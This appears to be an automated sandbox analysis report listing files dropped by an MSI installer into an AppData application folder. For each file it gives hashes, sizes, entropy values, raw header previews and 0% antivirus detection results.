                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...f092.........." .........................................................0............`.........................................`...l............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-namedpipe-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.7263193693903345
                  Encrypted:false
                  SSDEEP:192:cWYhWZSWWFYg7VWQ4eWkcc7ZqnajgnLSp:cWYhW84cllk2p
                  MD5:CFF476BB11CC50C41D8D3BF5183D07EC
                  SHA1:71E0036364FD49E3E535093E665F15E05A3BDE8F
                  SHA-256:B57E70798AF248F91C8C46A3F3B2952EFFAE92CA8EF9640C952467BC6726F363
                  SHA-512:7A87E4EE08169E9390D0DFE607E9A220DC7963F9B4C2CDC2F8C33D706E90DC405FBEE00DDC4943794FB502D9882B21FAAE3486BC66B97348121AE665AE58B01C
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....%..........." .........................................................0......[.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processenvironment-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12744
                  Entropy (8bit):6.601327134572443
                  Encrypted:false
                  SSDEEP:192:qKWYhWbWWFYg7VWQ4eWYoWjxceXqnajLJe:qKWYhWJ4WjmAlnJe
                  MD5:F43286B695326FC0C20704F0EEBFDEA6
                  SHA1:3E0189D2A1968D7F54E721B1C8949487EF11B871
                  SHA-256:AA415DB99828F30A396CBD4E53C94096DB89756C88A19D8564F0EED0674ADD43
                  SHA-512:6EAD35348477A08F48A9DEB94D26DA5F4E4683E36F0A46117B078311235C8B9B40C17259C2671A90D1A210F73BF94C9C063404280AC5DD5C7F9971470BEAF8B7
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0.......Z....`.........................................`...H............ ...................!..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):14272
                  Entropy (8bit):6.519411559704781
                  Encrypted:false
                  SSDEEP:192:AWXk1JzX9cKSIvWYhWLWWFYg7VWQ4SWW0uI7oinEqnajxMyqY:AWXk1JzNcKSIvWYhW5+uOEle6
                  MD5:E173F3AB46096482C4361378F6DCB261
                  SHA1:7922932D87D3E32CE708F071C02FB86D33562530
                  SHA-256:C9A686030E073975009F993485D362CC31C7F79B683DEF713E667D13E9605A14
                  SHA-512:3AAFEFD8A9D7B0C869D0C49E0C23086115FD550B7DC5C75A5B8A8620AD37F36A4C24D2BF269043D81A7448C351FF56CB518EC4E151960D4F6BD655C38AFF547F
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...j............." .........................................................0......%C....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-1.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12232
                  Entropy (8bit):6.659079053710614
                  Encrypted:false
                  SSDEEP:192:NtxDfIeA6WYhW7WWFYg7VWQ4eWpB5ABzR/BVrqnajcb:NtxDfIeA6WYhWp28RLlA
                  MD5:9C9B50B204FCB84265810EF1F3C5D70A
                  SHA1:0913AB720BD692ABCDB18A2609DF6A7F85D96DB3
                  SHA-256:25A99BDF8BF4D16077DC30DD9FFEF7BB5A2CEAF9AFCEE7CF52AD408355239D40
                  SHA-512:EA2D22234E587AD9FA255D9F57907CC14327EAD917FDEDE8B0A38516E7C7A08C4172349C8A7479EC55D1976A37E520628006F5C362F6A3EC76EC87978C4469CD
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......6y....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-profile-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11200
                  Entropy (8bit):6.7627840671368835
                  Encrypted:false
                  SSDEEP:192:clIHyZ36WYhWulWWFYg7VWQ4yWqeQDbLtsQlmqnajlDC:clIHyZKWYhWKhlbp6l9C
                  MD5:0233F97324AAAA048F705D999244BC71
                  SHA1:5427D57D0354A103D4BB8B655C31E3189192FC6A
                  SHA-256:42F4E84073CF876BBAB9DD42FD87124A4BA10BB0B59D2C3031CB2B2DA7140594
                  SHA-512:8339F3C0D824204B541AECBD5AD0D72B35EAF6717C3F547E0FD945656BCB2D52E9BD645E14893B3F599ED8F2DE6D3BCBEBF3B23ED43203599AF7AFA5A4000311
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....f............" .........................................................0.......>....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-rtlsupport-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12224
                  Entropy (8bit):6.590253878523919
                  Encrypted:false
                  SSDEEP:192:4GeVvXK9WYhW1WWFYg7VWQ4yWj6k50IsQlmqnajlDl:4GeVy9WYhWzVk6l9l
                  MD5:E1BA66696901CF9B456559861F92786E
                  SHA1:D28266C7EDE971DC875360EB1F5EA8571693603E
                  SHA-256:02D987EBA4A65509A2DF8ED5DD0B1A0578966E624FCF5806614ECE88A817499F
                  SHA-512:08638A0DD0FB6125F4AB56E35D707655F48AE1AA609004329A0E25C13D2E71CB3EDB319726F10B8F6D70A99F1E0848B229A37A9AB5427BFEE69CD890EDFB89D2
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...._............" .........................................................0.......S....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-string-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.672720452347989
                  Encrypted:false
                  SSDEEP:192:byMvQWYhW5fWWFYg7VWQ4eWio3gDwcunYqnajv9JS:byMvQWYhW/BXwulhw
                  MD5:7A15B909B6B11A3BE6458604B2FF6F5E
                  SHA1:0FEB824D22B6BEEB97BCE58225688CB84AC809C7
                  SHA-256:9447218CC4AB1A2C012629AAAE8D1C8A428A99184B011BCC766792AF5891E234
                  SHA-512:D01DD566FF906AAD2379A46516E6D060855558C3027CE3B991056244A8EDD09CE29EACEC5EE70CEEA326DED7FC2683AE04C87F0E189EBA0E1D38C06685B743C9
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....<.........." .........................................................0.......g....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\axvlc.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):1345272
                  Entropy (8bit):6.161377083530628
                  Encrypted:false
                  SSDEEP:24576:znT9uScWQKzgN4Meg4XDZtzSMPwiqrro1C1ofz7TTT6TTTETTTNTTTSfYvgraBX:zT9zgSMeg4X1tzbPwiFV
                  MD5:FB4C004BF35387708D5D29F793431C5E
                  SHA1:1008E48C629A5101B0AF8F2181B15F40EF99B115
                  SHA-256:6711F40F647CE531B9747516674CE86CA1E3749295DD6ED0C8E7C84C145F1275
                  SHA-512:21A201DC781C4655AB33B36E4B61049811DC2E8CF3A5CF52D1F9753E6179046B7F825C7DCBEB2FC28B2AFD2D20D51812FDACED60B5B2CF7B883F90AA066436FF
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........L......... .........F.................@..........................................`... ..................................................:... ...............L...:......\".......................... ...(...................X................................text...(...........................`.P`.data....!......."..................@.`..rdata..............................@.`@.buildid5...........................@.0@.pdata..............................@.0@.xdata...............D..............@.0@.bss..................................`..edata...............D..............@.0@.idata...:.......<...F..............@.0..CRT....X...........................@.@..tls....h...........................@.`..rsrc........ ......................@.0..reloc..\".......$...&..............@.0B/4...................J..............@.0B................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\bibfgi.rar

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:EBCDIC text, with very long lines (65536), with no line terminators, with overstriking
                  Category:dropped
                  Size (bytes):172452224
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:X3:n
                  MD5:FD2D1AD9EA14088C79BAEB5AD164CDCF
                  SHA1:C1CC153A0FFF262BDADDEC8F319BEC6619BF4A3C
                  SHA-256:0ECE01EF8DBE16705C55AE84EC16719C8065772C6C7E75765F7B16C731222E31
                  SHA-512:E2E7C233FD065BB57FBEF34A0D915183FA26FAFF2B9FE5F1E4DDD28BE4765D8756E3BCFB915F2E73CCA9707E5684EDF7A5B2C84C8DD70E4D7348FC880A6DC907
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clretwrc.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):304784
                  Entropy (8bit):4.242899121071685
                  Encrypted:false
                  SSDEEP:
                  MD5:5943C1160114F0D8382FEA84B0BF74DF
                  SHA1:DB390099DA2A61881DC2E5958F8CC308A6C765C9
                  SHA-256:271DDA649423F1F5068048D1A4D7FFB00E1B44A608674D9D9FDBC8D282976488
                  SHA-512:8A602569246428E89E9BEF2E31D69497C8B31F690B1E73ABBA6BF9607F9E9DAE9EFAB173A49598373F085071B8216DC42A591CD8DA89F9CA5788380DE1F273D5
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yj=.=.S.=.S.=.S..~..<.S..~Q.<.S.Rich=.S.PE..d......d.........." .........|......................................................B.....`.......................................................... ..xx...........~...(..............T............................................................................rdata..X...........................@..@.rsrc...xx... ...z..................@..@.......d........l...l...l..........d...........................d........l...................................RSDS...Q..+M.G...VD.....D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\clretwrc\clretwrc.pdb.............................T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... .......rsrc$01.....!..hw...rsrc$02....................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clrjit.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):1436816
                  Entropy (8bit):6.4842656747358465
                  Encrypted:false
                  SSDEEP:
                  MD5:FD9028C9B8FC323D5B94C56FF56F964C
                  SHA1:417E54906C96257F07C7B8530289A6F2C2E8073C
                  SHA-256:682D826EC62A432F71897AF7A73A1BA678F718E4C84232E49FB7343DE452B90F
                  SHA-512:76144375964A34F8EE8ED1A0A866BBB7A26A7B9263FFE5943FFCE143B0E86B202DEAE3F12B06F544F7C77FDE86977B51D88474D672CD33D07701A30468CDAF53
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^.C?..C?..C?..JG..O?...M..D?..C?...?...J..b?...J..M?...J..J?...J..(?...J..B?...Jy.B?...J..B?..RichC?..................PE..d...$..d.........." .....,................................................... ............`A............................................t....................0..@........(......|.......p....................k..(...@...8............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data....<..........................@....pdata..@....0......................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\coreclr.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):5125776
                  Entropy (8bit):6.5506861274321215
                  Encrypted:false
                  SSDEEP:
                  MD5:D81E8655CF6C4B20B195DE1D31116ADB
                  SHA1:C27A9BBAF12113A928698BF343D4660A056A6FAA
                  SHA-256:D5F1486B50755B7391C113EAE602DB1940578B39B565B60AC4D979EB14CA7C8F
                  SHA-512:6CC0AA43F7F1AF07837519C7B5CD351EB7206B3477F0EAF754D0F16DBE6452BB89FFE08704C4E5A56E092B8285CB2B7CBBA058E2A59398C5EF4CDC2CDD86A2F4
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.+.N.x.N.x.N.x.6tx.N.xt<.y.N.xt<.y.N.x.N.x.O.x.;.y.N.x.;.y.N.x.;.y.N.x`;.y.N.x`;.yrO.x`;.y.N.x`;.x.N.x`;.y.N.xRich.N.x........................PE..d......d.........." ......<......... .........................................O.......N...`A........................................@OI.D....PI......`O...... K.t.....N..(...pO.Ha..0.>.p.....................?.(.....=.8.............<......MI.`....................text.....<.......<................. ..`.CLR_UEF\.....<.......<............. ..`.rdata........<.......<.............@..@.data... .....I..:...RI.............@....pdata..t.... K.......I.............@..@.didat..8.....N......jL.............@...Section.......N......lL.............@..._RDATA...3... N..4...nL.............@..@.rsrc........`O.......M.............@..@.reloc..Ha...pO..b....M.............@..B................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):32572
                  Entropy (8bit):4.009015102516367
                  Encrypted:false
                  SSDEEP:
                  MD5:E9C25E017316D6887BD0C521A876815B
                  SHA1:0CD8FE9A6A50F0983694494E36F5DDFF16CA631D
                  SHA-256:064D2603D423F3F2AABEB11E65C2AB8ECCB0E9FCF30EC57C59654D9396520958
                  SHA-512:27C44F124513C0E1668CC7F304CA58F4ED5CAF9660E649695633BA599C5AE21D497EA854FC3E9BFEE34651FF56B4353C4C857BE6431294D7AE57A30BC8B77C9F
                  Malicious:false
                  Preview:#*****************************************************************************.#units.dat, the units data file, version 0.7.3.#.# ConvertAll, a units conversion program.# Copyright (C) 2020, Douglas W. Bell.#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This program is.# distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent unit or unit.# combination. A Python expression may be used for the quantity, but is.# restricted to using only the following operators: *, /, +, -..# Beware of integer division truncation: be sure to use a float for at least.# one of the values..#.# The unit type must be placed in square brackets before a set of units. The.# first comment after the equivalent unit will be put in parenthesis after the.# unit name (usual

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_ca.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):40536
                  Entropy (8bit):4.030801592661093
                  Encrypted:false
                  SSDEEP:
                  MD5:43EFBBAC42A60607739016747CC922E2
                  SHA1:7232EC8093A328951BF563EBAAC068C15F967FD1
                  SHA-256:3A479C57A6C93D8CAEEAB2AAB566B491175A9D30710109CE825AE78DE442A50F
                  SHA-512:6C1733DB7F1F85AD833BD6AA40D3C8471EF0A2B3576EFE4C6A04B84D20091E64613E7B0ACAF4BB155E4A68D9AC00A5918340205F059D4EC2C33C2C2EE52C71A8
                  Malicious:false
                  Preview:#*****************************************************************************.#units.dat, the units data file, version 0.7.3.#.# ConvertAll, a units conversion program.# Copyright (C) 2017, Douglas W. Bell.# Copyright (C) 2019, Pere Orga <pere@orga.cat>, per la versi. catalana..#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This program is.# distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent unit or unit.# combination. A Python expression may be used for the quantity, but is.# restricted to using only the following operators: *, /, +, -..# Beware of integer division truncation: be sure to use a float for at least.# one of the values..#.# The unit type must be placed in square brackets before a set of units. The.# first comment after t

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_de.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):34241
                  Entropy (8bit):4.276348317191952
                  Encrypted:false
                  SSDEEP:
                  MD5:323950ADBA3E70F3C5BDB2A7AAB9DE61
                  SHA1:95F2E60B0DB9C0A1330FCCBE2ACC6D9D6248FAED
                  SHA-256:5D917547FD819694C6F8C72294132572A05C332FA4453D47044F7DADE5CDED76
                  SHA-512:8A94BBA1E443AA90B5436DCCA47B73F053AABEE87BD14B463B4B7189E0EED75D90D59F48EF1743832EB73D316259234079A1DB5B3ADAB06162A57E556D188C63
                  Malicious:false
                  Preview:#*****************************************************************************.# units.dat, the units data file, version 0.6.0.#.# ConvertAll, a units conversion program.# Copyright (C) 2015, Douglas W. Bell.#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This program is.# distributed in the hope that it will be useful, but WITTHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent unit or unit.# combination. A python expression may be used for the quantity, but is.# resticted to using only the following operators: *, /, +, -, **, (, )..# Beware of integer division truncation: be sure to use a float for at.# least one of the values..#.# The unit type must be placed in square brackets before a set of units..# The first comment after the equivalent unit will be put in parenthesis after.# the unit n

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_es.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):28148
                  Entropy (8bit):4.10275524405603
                  Encrypted:false
                  SSDEEP:
                  MD5:D7BD14DBAFDF79AF082296354D122A3C
                  SHA1:AB69D3DE33FD102E6172FFB17F2F46CE2C53A523
                  SHA-256:B0AF3CFF7D745B361BAB97B43DDB0EDE61955187C09780E7237E142C3B5AF9AA
                  SHA-512:D116BB10563821432C408C418EEEFE72352D1ECF289BE7CB27D1ECC07CCBE2B573D9D23281733B37892A716D422C7AFECCC03E6504B2894AE1C555D9BED3D14D
                  Malicious:false
                  Preview:#*****************************************************************************.# units.dat, el archivo de datos de unidad, versi.n 0.6.0.#.# ConvertAll, un programa para convertir unidades.# Copyright (C) 2015, Douglas W. Bell.#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This program is.# distributed in the hope that it will be useful, but WITTHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent unit or unit.# combination. A python expression may be used for the quantity, but is.# resticted to using only the following operators: *, /, +, -, **, (, )..# Beware of integer division truncation: be sure to use a float for at.# least one of the values..#.# The unit type must be placed in square brackets before a set of units..# The first comment after the equivalent unit will be put in parenthesi

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_fr.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):26297
                  Entropy (8bit):4.098740347426859
                  Encrypted:false
                  SSDEEP:
                  MD5:39B4C2E5A75D1D1780316A5953E8E49E
                  SHA1:3AFA497C54FD45B6CB8546BB35B921E0106154E8
                  SHA-256:32C443BE19230980DFDDF4D52C0E35A3FB7BBB1F2EAAB84B4FAA4C1DD9B77AF1
                  SHA-512:8161ABDDD09A464DC4F4AAFFC9E569B3738F93482EF0C1301CC7E7BA4788E9786FA5D36927C10915A571C09741BC6B1FA1E8B785C6AC0D7E0A17CF6AEE4639F6
                  Malicious:false
                  Preview:#*****************************************************************************.# units.dat, the units data file, version 0.6.0.#.# ConvertAll, a units conversion programme.# Copyright (C) 2014, Douglas W. Bell.#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This programme is.# distributed in the hope that it will be useful, but WITTHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent unit or unit.# combination. A python expression may be used for the quantity, but is.# resticted to using only the following operators: *, /, +, -, **, (, )..# Beware of integer division truncation: be sure to use a float for at.# least one of the values..#.# The unit type must be placed in square brackets before a set of units..# The first comment after the equivalent unit will be put in parenthesis after.# the un

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_ru.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):39232
                  Entropy (8bit):4.472585461338878
                  Encrypted:false
                  SSDEEP:
                  MD5:73F93852BA5CCB235FC4805DF347659A
                  SHA1:8B4E21888D8B51D9E56C9618D0459F12E5E58DE2
                  SHA-256:8F5F759AB22EE7C3E6E0B3AFB1674912A3B45A5D53C54D0C80C2DE5875080DE1
                  SHA-512:2A4899C332D8421770198E664CAFE5D787A7DF6CE1FB88DE95F7ABDA4C12E72E5B311E67AEBF054ED953123EF630F9141B7418A4588FE67D422BD6A4B733F714
                  Malicious:false
                  Preview:#*****************************************************************************.# units.dat, .... ...... ......., ...... 0.7.3.#.# ConvertAll - ......... ... ............... ........# Copyright (C) 2018, Douglas W. Bell.# .# ... ......... ........... ...........; .. ...... .............. ./... .........# ... . ............ . ......... GNU General Public License, ...... 2..# ... ......... ................ . ......., ... ..... ......., .. ... ...... ..........#*****************************************************************************.#.# ........ ............ ........... . ............. ......... ... ............# ........ ... ........ .......... ..... .... .

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\data\units_sv.dat

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 text
                  Category:dropped
                  Size (bytes):32496
                  Entropy (8bit):4.085213100734249
                  Encrypted:false
                  SSDEEP:
                  MD5:ADDCA3AE59BC60FA1B2D621784211DC0
                  SHA1:C7EFA356EA2E7A4C01BAF4BE1C76E0BBA8CB7A7D
                  SHA-256:2C04FBB22D0EB6AE6A97B68C1075B7D3A409EBEB69780071F28117EFE8EC3DBD
                  SHA-512:BEF836423F3A438B5D915F3664B59A444AAFBC300084BB3585ED9B1EB421CDEC5F80F528955E14B8B1C8D6E6693CFA0CBB698FF4702F43FF1CE120FDE7567917
                  Malicious:false
                  Preview:#*****************************************************************************.#enheters.dat, the enheters data file, version 0.7.3.#.# ConvertAll, a enheters conversion program.# Copyright (C) 2017, Douglas W. Bell.#.# This is free software; you can redistribute it and/or modify it under the.# terms of the GNU General Public License, Version 2. This program is.# distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY..#*****************************************************************************.#.# Units are defined by an optional quantity and an equivalent enheter or enheter.# combination. A Python expression may be used for the quantity, but is.# restricted to using only the following operators: *, /, +, -..# Beware of integer division truncation: be sure to use a float for at least.# one of the values..#.# The enheter type must be placed in square brackets before a set of enheters. The.# first comment after the equivalent enheter will be put in parenthesis afte

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Assign Prerequisites.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.077213957707642
                  Encrypted:false
                  SSDEEP:
                  MD5:94E14F09CF2B0C323B5498FCDFBD87BB
                  SHA1:3830C61266C051DF2EA8884447670A96633112FC
                  SHA-256:79B35C4A81FE05298793E2BD26D11AD31E5AF8425A3F988F8EBECC40C507CC68
                  SHA-512:F9CAD086601136D35F52FF7B811A6A88E7715A2DC7C462F58E12E248F046F11D70C3733963666DF16D65A89B4D51F62D60CBB2F4937ED810DED5E5D0F154E8BF
                  Malicious:false
                  Preview:BM6.......6...(........................................................................................f..f..f..f..f..f..f.............................f.f.ff.ff.f3.33.3.f..f..f..f..f..f..............f....f.ff.ff.f3.3.f..............f..............f.......f.ff.ff.f.f..............f..............f..f..f..f..f..f..f..............f..........................................................................................f..f..f..3..3......................................f..f..f..3.........................................f..f..f.......................................................f..f..f..f..f..f..f..............f..............f.f.ff.ff.f3.33.3.f..............f..............f....f.ff.ff.f3.3.f..............f..............f.......f.ff.ff.f.f..f..f..f..f..f..............f..f..f..f..f..f..f............................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Assign Resources.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.0781299846620236
                  Encrypted:false
                  SSDEEP:
                  MD5:42B56855A6EE8F2EC4E185A2D93B52D5
                  SHA1:526096590A35AC4CD54D98D364223DC136C4003E
                  SHA-256:447D013B727783C6601BF03DFB640289FAEDF4861C6F7654070D46F8C34CAB68
                  SHA-512:D2279F3D5DB2ACE704F8B71747AD7EEBA92E4F87D0942F6870234757A855EDDBA703AFDD79AD660694E0D85AC0EA86B4195B119C6BCD32FEADD3B806E419EDF4
                  Malicious:false
                  Preview:BM6.......6...(................................................................................................................f..f..f..f..f..f..f.............................f.f.ff.ff.f3.33.3.f..............f..f..f..f..f..f....f.ff.ff.f3.3.f..............f..............f.......f.ff.ff.f.f..............f..............f..f..f..f..f..f..f..............f..............f..f..f..f..f..f..f..............f..............f.f.ff.ff.f3.33.3.f..............f..f..f..f..f..f....f.ff.ff.f3.3.f..............f..............f.......f.ff.ff.f.f..............f..............f..f..f..f..f..f..f.........................................................f..f..f..3..3......................................f..f..f..3.........................................f..f..f..............................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Column Options.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.9483459356843928
                  Encrypted:false
                  SSDEEP:
                  MD5:6119E2D64124ED562DE92B79964589C2
                  SHA1:64C12D62B54B63C8BF083FE44164A2C4241BDCB7
                  SHA-256:BCC0C02A6EC0D443D73803823CAA6E6E34E9FBFFE82D8D54AFA742AF0FF89587
                  SHA-512:9C6920758968B2FEFBFBFDBDDC8CF4AC6643BBB719A2E24021046BB739A5242CF85AF15EFC4A2157FECC7DADA2CEFF29C298650108BB81EA5363119660FFB9C7
                  Malicious:false
